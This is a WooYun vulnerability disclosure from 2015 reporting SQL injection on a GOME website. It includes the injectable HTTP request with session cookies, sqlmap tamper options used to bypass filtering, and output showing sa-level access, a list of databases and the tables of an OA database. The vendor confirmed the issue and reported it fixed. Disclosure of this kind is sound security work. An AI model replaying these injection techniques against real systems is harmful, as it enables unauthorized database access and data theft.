当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161942

漏洞标题:国美某重要站SQL注入22个数据库

相关厂商:国美控股集团

漏洞作者: 路人甲

提交时间:2015-12-16 21:38

修复时间:2015-12-25 09:27

公开时间:2015-12-25 09:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-16: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

该网站cps.gome.com.cn 数据库600多个表,可以垮裤查OA系统数据;sa权限可以直接列目录。

GET /Cps/News/IndexShow?NoticeName= HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://cps.gome.com.cn/Cps/News/IndexShow
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Host: cps.gome.com.cn
Cookie: BIGipServerpool_cps=2033334794.20480.0000; topNewsPopup=0; newsListPopup=0; JSESSIONID=pgMdWxvR1JJvK2Xbw6ZlZbCpGLQmDJxzd2PbT9Wk1G2Fs39z2R9s!2018110695; uid=CjozJlZxIpEwFoB2AwUAAg==; DSESSIONID=370dfcf6f7f1456083ddd554757a848a
Accept-Encoding: gzip, deflate
tamper 用between 和 space2comment,绕过简单过滤
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[19:53:13] [INFO] fetching current user
[19:53:13] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:53:13] [INFO] retrieved:
[19:53:13] [WARNING] reflective value(s) found and filtering out
sa
current user: 'sa'
[19:53:17] [INFO] fetched data logged to text files under './output/cps.gome.com.cn'
[*] shutting down at 19:53:17
[19:54:29] [WARNING] reflective value(s) found and filtering out
当前目录:
D:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\ERRORLOG
[19:56:36] [INFO] testing if current user is DBA
available databases [21]:
[*] AdvertisementPromotion
[*] CollegeUnion
[*] distribution
[*] FenxiangbaoCommunity
[*] GomeCps
[*] GomeCPSClick
[*] GomeFXBao
[*] GomeOA
[*] GomeRecharge
[*] GomeVenues
[*] GomeWeiXinMall
[*] master
[*] model
[*] msdb
[*] NationalBak
[*] NationalUnion20140717
[*] NationalUnionHistory
[*] ProjectStatusLog
[*] TaskPlatform
[*] tempdb
[*] ZzzLinShi
OA系统
Database: GomeOA
[20 tables]
+-------------------+
| BodyEffect |
| BodyOccur |
| Bugs |
| DaShuJu |
| DaShuJuName |
| Daily |
| FxbDailySitePlat |
| OccurDailyShop |
| OccurDailyShopSid |
| OccurDailySid |
| OccurProEffect |
| Project |
| ProjectBackUp |
| ProjectFile |
| QuanOrder |
| ReceiveProEffect |
| Task |
| User |
| UserDate |
| Word |
+-------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-18 10:12

厂商回复:

感谢您提供的信息

最新状态:

2015-12-25:漏洞已修复,感谢提报


漏洞评价:

评论

  1. 2015-12-16 23:54 | 渗透需要你 ( 路人 | Rank:2 漏洞数:1 | 渗透技术。联系我,kkjk.net.给你不一样的...)

    q